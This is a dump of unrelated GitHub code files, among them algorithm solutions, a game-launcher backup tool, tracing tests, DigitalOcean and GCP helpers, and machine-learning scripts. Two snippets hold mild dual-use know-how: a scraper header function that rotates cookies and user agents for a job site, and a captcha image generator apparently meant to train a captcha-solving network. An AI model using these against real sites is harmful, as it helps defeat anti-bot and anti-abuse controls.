树的子结构\nhttps://leetcode.cn/problems/shu-de-zi-jie-gou-lcof/?favorite=xb9nqhhg\n\"\"\"\nfrom collections import deque\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution0:\n \"\"\" 层序遍历嵌套深度遍历\n 层序遍历 A,\n 遇到 A 节点的 val 等于 B 根节点的 val 的节点再进行深度遍历子树判断 \"\"\"\n\n def isSubStructure(self, A: TreeNode, B: TreeNode) -> bool:\n if not B or not A:\n return False\n\n def dfs(node_A, node_B):\n node_A_left, node_A_right = node_A.left, node_A.right\n node_B_left, node_B_right = node_B.left, node_B.right\n\n if node_B_left and (\n not node_A_left or node_A_left.val != node_B_left.val) \\\n or node_B_right and (\n not node_A_right or node_A_right.val != node_B_right.val):\n return False\n else:\n if not node_B_left:\n flag_left = True\n else:\n flag_left = dfs(node_A_left, node_B_left)\n if not node_B_right:\n flag_right = True\n else:\n flag_right = dfs(node_A_right, node_B_right)\n return flag_left and flag_right\n\n root_B = B.val\n cur_A = A\n queue = deque([cur_A])\n while queue:\n node = queue.popleft()\n left_node = node.left\n if left_node:\n queue.append(left_node)\n right_node = node.right\n if right_node:\n queue.append(right_node)\n if node.val == root_B:\n if dfs(node, B):\n return True\n return False\n\n\nclass Solution1:\n \"\"\" 代码更简洁 先序遍历 \"\"\"\n def isSubStructure(self, A: TreeNode, B: TreeNode) -> bool:\n def recur(A, B):\n if not B:\n return True\n if not A or A.val != B.val:\n return False\n return recur(A.left, B.left) and recur(A.right, B.right)\n\n return bool(A and B) and (\n recur(A, B) or self.isSubStructure(A.left, B)\n or self.isSubStructure(A.right, B)\n )\n","repo_name":"ZhangRui111/AwesomeAlgorithm","sub_path":"JZOffer/medium/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31034921030","text":"import random\n \ndef random_header(self):\n \"\"\"\n 随机生成请求头\n :return: headers\n \"\"\"\n headers = {'Referer': 'https://www.zhipin.com/c101020100/?ka=sel-city-101020100'}\n headers['cookie'] = random.choice(self.cookies)\n headers['user-agent'] = random.choice(self.user_agents)\n return headers\n\n\nrandom_header()","repo_name":"tear-0/pypyyy","sub_path":"爬虫案例/null.py","file_name":"null.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27482714061","text":"from sys import platform\nimport imgui\nimport easygui\nimport shutil\nimport os\nimport zipfile\nimport time\nfrom components.util import LogLevel, Logger\n\nfrom settings import Settings\n\nclass DataManager:\n logger = Logger(\"DataManager\", LogLevel.DEBUG, \"latest.log\")\n logger.info(\"Loading settings\")\n\n settings = Settings(\"settings.properties\")\n data_saves = settings.get(\"data_saves\", [\"Default\"])\n current_data_save = settings.get(\"data_save\", 0)\n\n backup_folders = {\"files\": False}\n chosen_backup = 0\n save_dir = \"\"\n\n def __init__(self, parent) -> None:\n self.logger.info(\"Loading data manager\")\n self.parent = parent\n self.save_dir = self.get_save_dir()\n self.logger.info(\"Done\")\n if not os.path.exists(\"backups\"):\n os.mkdir(\"backups\")\n\n def render(self):\n imgui.begin(\"Data manager\")\n imgui.text(\"Data folders\")\n if imgui.button(\"Create data folder\"):\n self.data_saves.append(easygui.diropenbox(\"Select new save folder\"))\n if self.data_saves[self.current_data_save] != \"Default\":\n imgui.same_line()\n if imgui.button(\"Delete data folder\"):\n self.logger.info(\"Delete data folder?\")\n res = easygui.buttonbox(f\"Are you sure you want to delete this save data directory ({self.data_saves[self.current_data_save]})? You can also just remove it from the list, and re-add it later using the 'Create' button.\", \"Delete save data directory\", (\"Delete\", \"Remove\", \"Cancel\"))\n if res != \"Cancel\":\n self.logger.info(\"Yes\")\n if res == \"Delete\":\n self.logger.debug(\"Deleting\")\n shutil.rmtree(self.data_saves[self.current_data_save])\n self.data_saves.remove(self.data_saves[self.current_data_save])\n self.current_data_save = 0\n self.save_dir = self.get_save_dir()\n c, self.current_data_save = imgui.combo(\"Current data folder\", self.current_data_save, self.data_saves)\n if c:\n self.save_dir = self.get_save_dir()\n imgui.text(\"Data backups\")\n show, _ = imgui.collapsing_header(\"Create a backup\")\n if show:\n dir = self.save_dir\n for folder in os.listdir(dir):\n if os.path.isdir(f\"{dir}/{folder}\"):\n if not folder in self.backup_folders.keys():\n self.backup_folders[folder] = False\n _, self.backup_folders[folder] = imgui.checkbox(folder, self.backup_folders[folder])\n _, self.backup_folders[\"files\"] = imgui.checkbox(\"Files\", self.backup_folders[\"files\"])\n if imgui.button(\"Create backup\"):\n self.logger.info(\"Creating backup\")\n t = time.asctime().replace(\":\", \".\")\n if not os.path.exists(f\"backups\"):\n os.makedirs(\"backups\")\n with zipfile.ZipFile(f\"backups/{t}.zip\", mode='w') as zip_file:\n save_dir = self.get_save_dir()\n len_dir_path = len(save_dir)\n for file in os.listdir(save_dir):\n if os.path.isdir(f\"{save_dir}/{file}\") and self.backup_folders[file]:\n self.logger.debug(f\"Backup dir : {save_dir}/{file}\")\n self.zip_dir(f\"{save_dir}/{file}\", zip_file, len_dir_path)\n if self.backup_folders[\"files\"] and not os.path.isdir(f\"{save_dir}/{file}\"):\n self.logger.debug(f\"Backup file: {save_dir}/{file}\")\n file_path = os.path.join(save_dir, file)\n zip_file.write(file_path, file_path[len_dir_path:])\n\n show, _ = imgui.collapsing_header(\"Backups\")\n if show: \n backups = []\n for file in os.listdir(\"backups\"):\n backups.append(file)\n _, self.chosen_backup = imgui.combo(\"Backup\", self.chosen_backup, backups)\n #if imgui.button(\"Load backup\"):\n # TODO load\n #imgui.same_line()\n if imgui.button(\"Delete backup\"):\n self.logger.info(\"Delete backup?\")\n if easygui.ynbox(f\"Delete {backups[self.chosen_backup]}\", \"Confirm backup deletion\"):\n self.logger.info(\"Yes\")\n os.remove(f\"backups/{backups[self.chosen_backup]}\")\n self.chosen_backup = 0\n imgui.end()\n\n def zip_dir(self, path, zip_file, len_dir_path):\n self.logger.info(f\"Zipping {path} to {zip_file.filename}\")\n try:\n for file in os.listdir(path):\n zip_file.write(path+\"/\"+file, path[len_dir_path:]+\"/\"+file)\n except Exception as err:\n self.logger.error(\"Error while zipping dir: \" + str(err))\n raise err\n\n def get_save_dir(self):\n self.logger.info(\"Getting save dir\")\n dir = self.data_saves[self.current_data_save]\n try:\n if dir == \"Default\":\n self.logger.debug(\"Getting default dir\")\n if platform == \"linux\" or platform == \"linux2\":\n self.logger.debug(\"Detected linux\")\n if os.getenv(\"XDG_DATA_HOME\") != None:\n dir = os.getenv(\"XDG_DATA_HOME\")\n if not dir.endsWith(\"/\"): dir += \"/\"\n dir = dir + \"Mindustry/\"\n else:\n dir = os.path.expanduser(\"~\") + \"/.local/share/Mindustry/\"\n elif platform == \"win32\":\n self.logger.debug(\"Detected windows\")\n dir = os.getenv(\"AppData\") + \"/Mindustry\"\n self.logger.info(f\"Got dir: {dir}\")\n return dir\n except Exception as err:\n self.logger.error(\"Error getting save dir: \" + str(err))\n raise err\n\n def save_settings(self):\n self.logger.info(\"Saving settings\")\n try:\n self.settings.set(\"data_saves\", self.data_saves)\n self.settings.set(\"data_save\", self.current_data_save)\n except Exception as err:\n self.logger.error(\"Error saving settings: \" + str(err))\n raise err","repo_name":"GaviTSRA/MindustryLauncher","sub_path":"components/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25754117379","text":"import time\nimport mock\nfrom thundra.opentracing.tracer import ThundraTracer\n\n\ndef test_set_operation_name():\n tracer = ThundraTracer.get_instance()\n with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n span = scope.span\n assert span.operation_name == 'operation name'\n\n span.set_operation_name('second operation name')\n assert span.operation_name == 'second operation name'\n\n\ndef test_tag():\n tracer = ThundraTracer.get_instance()\n with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n span = scope.span\n assert bool(span.tags) == False\n\n span.set_tag('tag', 'test')\n tag = span.get_tag('tag')\n assert tag == 'test'\n\n\n@mock.patch('thundra.opentracing.recorder.ThundraRecorder')\ndef test_finish(mock_recorder):\n tracer = ThundraTracer.get_instance()\n with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n span = scope.span\n assert span.finish_time == 0\n\n end_time = time.time()\n span.finish(f_time=end_time)\n\n duration = end_time - span.start_time\n assert span.get_duration() == duration\n\n mock_recorder.record.assert_called_once\n\n\ndef test_log_kv():\n tracer = ThundraTracer.get_instance()\n with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n span = scope.span\n assert len(span.logs) == 0\n\n t = time.time()\n span.log_kv({\n 'log1': 'log',\n 'log2': 2,\n }, t)\n span.finish()\n\n assert len(span.logs) == 1\n log = span.logs[0]\n assert log['timestamp'] == t\n\n assert log['log1'] == 'log'\n assert log['log2'] == 2\n\n\ndef test_baggage_item():\n tracer = ThundraTracer.get_instance()\n with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n span = scope.span\n assert bool(span.context.baggage) == False\n\n span.set_baggage_item('baggage', 'item')\n assert span.get_baggage_item('baggage') == 'item'\n span.finish()\n","repo_name":"thundra-io/thundra-agent-python","sub_path":"tests/opentracing/test_span.py","file_name":"test_span.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"35275022612","text":"import json\nfrom pprint import pprint\nfrom typing import List, Union\n\nfrom sshpubkeys import SSHKey as SSHPubKey\nfrom digitalocean import SSHKey, Manager, Droplet\n\nfrom beauty_ocean.core import config, helpers\nfrom beauty_ocean.droplet import api\nfrom beauty_ocean.droplet import questions\n\n\ndef validate_public_key(path: str) -> Union[str, None]:\n \"\"\"\n :param str path: path to the public key\n :return: str or None\n \"\"\"\n pub_key = helpers.read_path(path)\n ssh = SSHPubKey(pub_key, strict=True)\n if ssh.parse() is None:\n return pub_key\n\n\ndef post_public_key(token: str, public_key: str) -> List[SSHKey]:\n \"\"\"\n Given the API token and the public key, posts the public key to\n the account.\n\n :param str token: the API token\n :param str public_key: the public key\n :return: a list of one element digitalocean.SSHKey\n \"\"\"\n name = questions.ask_for_public_key_name()\n ssh_key = SSHKey(token=token, name=name, public_key=public_key)\n\n # Post the ssh key to DO in order to get an ssh key id\n ssh_key = api.create_ssh_key(ssh_key)\n return [ssh_key]\n\n\ndef handle_ssh_keys(manager: Manager, addition_method: str) -> list:\n \"\"\"\n Post local public key to DO account or select one or more ssh keys\n that are already present on DO account.\n\n :param digitalocean.Manager.Manager manager: instance\n :param str addition_method: the chosen addition method (remote|local)\n :return: list (of zero or more digitalocean.SSHKey.SSHKey instances)\n \"\"\"\n msg = \"Enter the path to your public key\"\n if addition_method == \"remote\": # go get remote ssh keys\n remote_ssh_keys = questions.ask_for_remote_ssh_keys_selection(manager)\n if remote_ssh_keys:\n return remote_ssh_keys\n else:\n msg = f\"No ssh keys selected or found on DO! {msg}\"\n path = questions.ask_for_public_key_path(msg)\n public_key = validate_public_key(path)\n if public_key:\n return post_public_key(manager.token, public_key)\n return []\n\n\ndef handle_tag_selection(manager: Manager, both: bool = False) -> list:\n \"\"\"\n Handles tag selection\n\n :param digitalocean.Manager.Manager manager: instance\n :param boolean both: whether or not both remote + new tags to be added\n :return: list (of zero or more strings)\n \"\"\"\n tags = questions.ask_for_remote_tag_selection(manager)\n if not tags:\n message = (\n f\"No remote tags found {config.SORRY}! {questions.NEW_TAG_MSG}\"\n )\n return questions.ask_for_new_tag(message=message)\n if both:\n tags += questions.ask_for_new_tag()\n return tags\n\n\ndef handle_tags(manager, addition_method: str) -> list:\n \"\"\"\n Given an addition method, adds corresponding tag(s).\n\n :param digitalocean.Manager.Manager manager: instance\n :param str addition_method: the tag addition method\n :return: list (of zero or more strings)\n \"\"\"\n if addition_method == \"remote\":\n return handle_tag_selection(manager)\n elif addition_method == \"new\":\n return questions.ask_for_new_tag()\n else: # some/all remote and some new tags will be added\n return handle_tag_selection(manager, both=True)\n\n\ndef padding_text(s: str, length: int=60, pad: str=\"-\") -> str:\n \"\"\"\n Centers the given str between a padding form (total length is \"length\").\n Example (str = \"Hello\", length=11, pad=\"+\"):\n +++HELLO+++\n :param str s: the string to center\n :param int length: number of characters (incl. pad)\n :param str pad: the padding character\n :return: str\n \"\"\"\n return f\"\\n{s.upper().center(length, pad)}\\n\"\n\n\ndef review_droplet_data(data: dict) -> None:\n \"\"\"\n Pretty print the data dictionary that contains droplet's configuration.\n\n :param dict data: droplet data to be submitted\n :return: None\n \"\"\"\n exclude = \"token\"\n to_review = {k: v for k, v in data.items() if k != exclude}\n print(config.cyan_text(padding_text(\"Droplet configuration\")))\n pprint(to_review, indent=4, width=10)\n print(config.cyan_text(padding_text(\"End droplet configuration\")))\n\n\ndef create_droplet_now(droplet_params) -> Droplet:\n \"\"\"\n Given some droplet parameters, make an API call in order to create\n the Droplet.\n\n :param dict droplet_params: droplet (selected) parameters\n :return: digitalocean.Droplet instance\n \"\"\"\n # create a Droplet instance\n bare_droplet = Droplet(**droplet_params)\n\n # initialize it (to get the id)\n pre_droplet = api.boot_droplet(bare_droplet)\n\n # poll it in order to know when it'll be ready-to-go\n print(config.green_text(\"Droplet initialized! Booting...\"))\n droplet = api.poll_droplet(pre_droplet)\n print(config.green_text(\"Droplet has been created successfully! \\(´▽`)/\"))\n return droplet\n\n\ndef filter_droplet_return_data(droplet: Droplet) -> dict:\n \"\"\"\n Creates a new dict that contains valuable data from the newly created\n Droplet. Discards sensitive data such as \"token\" and any logs.\n\n :param digitalocean.Droplet.Droplet droplet: instance\n :return: dict\n \"\"\"\n to_return = {}\n black_list = [\"token\", \"_log\", \"_session\"]\n for key, value in vars(droplet).items():\n if key in black_list:\n continue\n elif key == \"ssh_keys\":\n to_return[\"ssh_keys\"] = [key.name for key in value]\n else:\n to_return[key] = value\n return to_return\n\n\ndef droplet_data_json(droplet: Droplet) -> str:\n \"\"\"\n Return a JSON representation of a (properly formatted) droplet.\n\n :param digitalocean.Droplet.Droplet droplet: instance\n :return: str (json)\n \"\"\"\n to_return = filter_droplet_return_data(droplet)\n return json.dumps(to_return)\n","repo_name":"manikos/beauty-ocean","sub_path":"beauty_ocean/droplet/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6052178082","text":"import functools\n\nimport imlib as im\nimport numpy as np\nimport pylib as py\nimport tensorflow as tf\nimport tensorflow.keras as keras\n#import tf2lib as tl\n#import tf2gan as gan\nimport tqdm\n\n#import data\nimport module\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n#Shared Networkparameter\ndim = 64 #number of filters\nnorm = 'none' #choices=['none','batch_norm','instance_norm','layer_norm']\nlr=0.0002\nbeta_1=0.5\nadversarial_loss_mode='lsgan' #choices=['gan', 'hinge_v1', 'hinge_v2', 'lsgan', 'wgan'])\ngradient_penalty_mode='none' #choices=['none', 'dragan', 'wgan-gp'])\ngradient_penalty_weight=10.0\ncycle_loss_weight=11.0\nidentity_loss_weight=0.0\npool_size = 50\n\n#Generator parameter\ng_downsamples = 1 #number of convolutions\nn_blocks = 6 #number of residualblocks\n\nGenerator = module.ResnetGenerator(input_shape=(128, 128, 1),\n output_channels=1,\n dim=64,\n n_downsamplings=1,\n n_blocks=6,\n norm='none')\n\nsave_dir = 'C:/Users/mam-pm/PycharmProjects/cyclegan_depthmaps_tensorflow/venv/'\nsave_name = \"CycleGAN_RL_21-09-16/\"\n\nGenerator.load_weights(save_dir + save_name + 'cycle_gan_RL_sim_to_real_weights.h5')\n\nimage = cv2.imread('C:/Users/mam-pm/Desktop/100 depthmaps_validierung_sim_grey_100/test.png', cv2.IMREAD_GRAYSCALE)\nimage = np.array(image).reshape(-1, 128, 128, 1)\nimage = image / 255.0\n#print(os.path.join(savedir, category, i))\ny = Generator.predict(image)\ny = y.reshape(128, 128)\ny += 1\ny = y * 255 / 2\nprint(y.shape, y.min(), y.max())\nplt.imsave('image_new.jpg',y, cmap='gray')\n","repo_name":"phmelzer/tensorflow-cyclegan","sub_path":"test_image.py","file_name":"test_image.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34145160738","text":"# coding:utf-8\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom captcha.image import ImageCaptcha\n\n\nNUMBER = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nLOW_CASE = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',\n 'v', 'w', 'x', 'y', 'z']\nUP_CASE = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',\n 'V', 'W', 'X', 'Y', 'Z']\nCAPTCHA_LIST = NUMBER + LOW_CASE + UP_CASE\nCAPTCHA_LEN = 4\nCAPTCHA_HEIGHT = 60\nCAPTCHA_WIDTH = 160\n\n\ndef random_captcha_text(char_set=CAPTCHA_LIST, captcha_size=CAPTCHA_LEN):\n '''\n 随机生成验证码文本\n :param char_set:\n :param captcha_size:\n :return:\n '''\n captcha_text = [random.choice(char_set) for _ in range(captcha_size)]\n return ''.join(captcha_text)\n\n\ndef gen_captcha_text_and_image(width=CAPTCHA_WIDTH, height=CAPTCHA_HEIGHT,save=None):\n '''\n 生成随机验证码\n :param width:\n :param height:\n :param save:\n :return: np数组\n '''\n image = ImageCaptcha(width=width, height=height)\n # 验证码文本\n captcha_text = random_captcha_text()\n captcha = image.generate(captcha_text)\n # 保存\n if save: image.write(captcha_text, captcha_text + '.jpg')\n captcha_image = Image.open(captcha)\n # 转化为np数组\n captcha_image = np.array(captcha_image)\n return captcha_text, captcha_image\n\n\nif __name__ == '__main__':\n t, im = gen_captcha_text_and_image(save=True)\n print(t, im)\n\n\n","repo_name":"lpty/tensorflow_tutorial","sub_path":"captchaCnn/captcha_gen.py","file_name":"captcha_gen.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"37"} +{"seq_id":"26376238987","text":"from django.urls import re_path\nfrom book_inventory import views \n \nurlpatterns = [ \n \n # API PAGES (drf)\n # re_path(r'^api/books/?$', views.book_inventory, name='book_inventory'),\n re_path(r'^api/books/?$', views.BookInventoryView.as_view(), name='book_inventory'),\n # re_path(r'^api/books/(?P(\\d+))/?$', views.book_details, name='book_details'),\n re_path(r'^api/books/(?P(\\d+))/?$', views.SelectedBookView.as_view(), name='book_details'),\n\n # REGULAR PAGES\n re_path(r'^books/(?P(\\d+))/?$', views.list_one, name='list_one'),\n # re_path(r'^(?:books)?/?$', views.list_all, name='list_all'),\n re_path(r'^books/?$', views.list_all, name='list_all'),\n re_path(r'^$', views.list_all, name='list_all'),\n] \n","repo_name":"aybarskerem/BookInventory","sub_path":"Library/book_inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222560340","text":"N, r, c = map(int, input().split())\n\ndef cube4(n,x,y):\n if x <= 1 and y <= 1:\n return 2*x+y\n half_length = 2**(n-1)\n if half_length > x:\n if half_length > y:\n return cube4(n-1,x,y)\n else:\n return 4**(n-1) + cube4(n-1,x,y-half_length)\n else:\n return 4**(n-1)*2 + cube4(n,x-half_length,y)\nprint(cube4(N,r,c))","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj1074.py","file_name":"boj1074.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70110308267","text":"import json\nfrom operator import ge\nfrom generator import Generator\nfrom address import address\n\nclass person:\n def __init__(self):\n Initials = Generator.genFullNameAndGender()\n self.firstName = Initials['name']\n self.lastName = Initials['surname']\n self.gender = Initials['gender']\n self.birthdate = Generator.genBirthDate()\n self.cpr = Generator.genCPR(self.gender, self.birthdate)\n self.phone = Generator.genPhoneNumber()\n self.address = address()\n\n #Debug\n def printPerson(self):\n print(f'First Name: {self.firstName} \\nLast Name: {self.lastName} \\nGender: {self.gender} \\nBirthdate: {self.birthdate} \\nCPR: {self.cpr}')\n #Address\n print(f'Town: {self.address.town} \\nZip Code: {self.address.zipCode} \\nStreet Name and Number: {self.address.street} {self.address.number} \\nFloor: {self.address.floor} \\nDoor: {self.address.door}')\n\n def toJson(self):\n jsonString = ''\n personString = f'\"firstName\":\"{self.firstName}\", \"lastName\":\"{self.lastName}\", \"gender\":\"{self.gender}\", \"birthdate\":\"{self.birthdate}\", \"cpr\":\"{self.cpr}\", \"phone\":\"{self.phone}\",'\n personString = '{' + personString \n addressString = str(self.address.__dict__).replace('{','')\n addressString = addressString.replace(\"'\",'\"')\n jsonString = personString + addressString\n return jsonString\n\n\n","repo_name":"ddorenDK/testing-course-man1","sub_path":"src/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31799410796","text":"import pika\n\n# 建立一个socket通信\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost')\n)\n\n# 声明一个管道\nchannel = connection.channel()\n\n# 声明一个中间转发器exchange\nchannel.exchange_declare(exchange='logs', exchange_type='fanout')\n\nwhile True:\n message = input(\">>:\").strip()\n if message == \"stop\":\n break\n # 向相应的queue里面发消息\n channel.basic_publish(exchange='logs', #转发器的名字\n routing_key='', # queue名字\n body=message, # 发送的内容\n )\n print(\"send \", message)\n\n# 关闭socket\nconnection.close()\n","repo_name":"besiccode/python_learning","sub_path":"RabbitMQ/fanout_producer.py","file_name":"fanout_producer.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595276638","text":"#!/usr/bin/env python3\n\n'''\nName: test_mailroom.py\nAuthor: Eric Rosko\nDate: May 28, 2018\nAssignment: 7\nPython ver. 3\n\nUsage: py.test -sv\n\n'''\n\nimport logging\nimport pytest\nfrom mailroom import logger\nfrom peewee import *\nfrom mailroom import Donor, Donation\n# from mailroom import database\n\n\ndef setup_function(function):\n \"\"\"\n Runs once before each function in this file.\n \"\"\"\n # global database\n database = SqliteDatabase('donors.db')\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;') # needed for sqlite only\n # database.create_tables([ Donor, Donation])\n # database.execute_sql(\"delete from Donor\")\n # database.execute_sql(\"delete from Donation\")\n\n\ndef teardown_function(function):\n # global database\n database.close()\n\n\ndef test_add_donor():\n global database\n try:\n with database.transaction():\n new_donor = Donor.create(\n name = 'Bob3')\n new_donor.save()\n\n logger.info('Reading and print donor')\n for donor in Donor:\n logger.info(f'{donor.name}')\n\n except Exception as e:\n logger.info(f'Error creating donor')\n logger.info(e)\n\n # with database.transaction():\n count = Donor.select().count()\n print(\"count is\", count)\n assert count == 1\n\n\ndef test_add_two_donors():\n global database\n try:\n with database.transaction():\n new_donor = Donor.create(\n name = 'Bob')\n new_donor.save()\n\n new_donor2 = Donor.create(\n name = 'Dave')\n new_donor2.save()\n\n logger.info('Reading and print donor')\n for donor in Donor:\n logger.info(f'{donor.name}')\n\n except Exception as e:\n logger.info(f'Error creating donor')\n logger.info(e)\n\n # with database.transaction():\n count = Donor.select().count()\n print(\"count is\", count)\n assert count == 2\n\n\ndef test_add_donation():\n\n try:\n with database.transaction():\n new_donor = Donor.create(\n name = 'Bob')\n new_donor.save()\n\n with database.transaction():\n new_donation = Donation.create(donor_id=new_donor.name,\n amount=123.45)\n new_donation.save()\n\n except Exception as e:\n logger.info(f'Error creating donation')\n logger.info(e)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/eric_rosko/lesson-07/test_mailroom.py","file_name":"test_mailroom.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7800161702","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Welcome to Jupyter!\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom cv2 import cv2 #'pip install opencv-python' require\n\nDATADIR = \"C:/Datasets/PetImages\"\nCATEGORIES = [\"DOG\", \"CAT\"]\nIMG_SIZE = 50\n\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category) #path to cats or dogs directory\n for img in os.listdir(path):\n #convert images in to an array while grayscaling the image\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_GRAYSCALE)\n \n plt.imshow(img_array, cmap=\"gray\")\n plt.show()\n #break\n #break > to test grayscale image\n\n\n# In[23]:\n\n\nprint(img_array.shape)\n\n\n# In[17]:\n\n\ntraining_data = []\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category) #path to cats or dogs directory\n class_num = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n #convert images in to an array while grayscaling the image\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE)\n #resize the image\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n #add the image to traing dataset\n training_data.append([new_array, class_num])\n except Exception as _:\n pass\n \ncreate_training_data()\n\n\n# In[58]:\n\n\nprint(len(training_data))\n\n\n# In[64]:\n\n\nimport random\n#shuffle traing dataset for efficient learning\nrandom.shuffle(training_data)\n\n\n# In[72]:\n\n\nX = []\ny = []\n\nfor features, label in training_data:\n X.append(features)\n y.append(label)\n \nX = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1) #1 because its grayscale\n\n\n# In[85]:\n\n\nimport pickle\n\npickle_out = open(\"X.pickle\", \"wb\")\npickle.dump(X, pickle_out)\npickle_out.close()\n\npickle_out = open(\"y.pickle\", \"wb\")\npickle.dump(X, pickle_out)\npickle_out.close()\n\n\n# In[99]:\n\n\npickle_in = open(\"X.pickle\", \"rb\")\nX = pickle.load(pickle_in)\n\n\n# This repo contains an introduction to [Jupyter](https://jupyter.org) and [IPython](https://ipython.org).\n# \n# Outline of some basics:\n# \n# * [Notebook Basics](../examples/Notebook/Notebook%20Basics.ipynb)\n# * [IPython - beyond plain python](../examples/IPython%20Kernel/Beyond%20Plain%20Python.ipynb)\n# * [Markdown Cells](../examples/Notebook/Working%20With%20Markdown%20Cells.ipynb)\n# * [Rich Display System](../examples/IPython%20Kernel/Rich%20Output.ipynb)\n# * [Custom Display logic](../examples/IPython%20Kernel/Custom%20Display%20Logic.ipynb)\n# * [Running a Secure Public Notebook Server](../examples/Notebook/Running%20the%20Notebook%20Server.ipynb#Securing-the-notebook-server)\n# * [How Jupyter works](../examples/Notebook/Multiple%20Languages%2C%20Frontends.ipynb) to run code in different languages.\n\n# You can also get this tutorial and run it on your laptop:\n# \n# git clone https://github.com/ipython/ipython-in-depth\n# \n# Install IPython and Jupyter:\n# \n# with [conda](https://www.anaconda.com/download):\n# \n# conda install ipython jupyter\n# \n# with pip:\n# \n# # first, always upgrade pip!\n# pip install --upgrade pip\n# pip install --upgrade ipython jupyter\n# \n# Start the notebook in the tutorial directory:\n# \n# cd ipython-in-depth\n# jupyter notebook\n","repo_name":"ryanleek/TensorFlow","sub_path":"tutorial_02.py","file_name":"tutorial_02.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25753592824","text":"from google.cloud import storage\n\n\nclass Transfer:\n\n def __init__(self, data_string, blob_name, bucket, project):\n self._data_string = str(data_string)\n self._blob_name = blob_name\n self._bucket = bucket\n self._project = project\n self._storage_client = storage.Client(project=self._project)\n self.upload_to_gcp()\n\n\n def upload_to_gcp(self):\n self._bucket = self._storage_client.bucket(self._bucket)\n self._blob = self._bucket.blob(self._blob_name)\n self._blob.upload_from_string(self._data_string)","repo_name":"crabb-beltran/encypt-decrypt-pgp-function","sub_path":"app/upload_string_gcp.py","file_name":"upload_string_gcp.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73789608748","text":"import streamlit as st\nimport pandas as pd\nimport joblib\n\n# Título de la app\nst.title('Pronóstico de lluvia para mañana')\n\n# Cargamos el dataset para obtener el nombre\n# de las columnas\ndf = pd.read_csv('datasets/df_reg.csv', index_col=0)\n\n# Cargamos los pipelines\nPATH_REG = 'models/regresion_pipeline.joblib'\nPATH_CLAS = 'models/clasificacion_pipeline.joblib'\n\npipeline_reg = joblib.load(PATH_REG)\npipeline_clas = joblib.load(PATH_CLAS)\n\nfeature_names = pipeline_reg.named_steps['imputer']\\\n .get_feature_names_out()\n\n\n# Definimos los nombres de las variables\n# eliminamos las variable de dirección que \n# no las vamos a usar para la app.\ncolumnas_numericas = list(df.columns[:-2])\n\n# cols_dir = ['WindGustDir', 'WindDir9am', 'WindDir3pm']\n\n# for col in cols_dir:\n# columnas_numericas.remove(col)\n\n# Generamos los sliders para\n# cada variable númerica\nfeatures = [st.slider(columna,\n df[columna].min(),\n df[columna].max(),\n round(df[columna].mean(), 2)) \n for columna 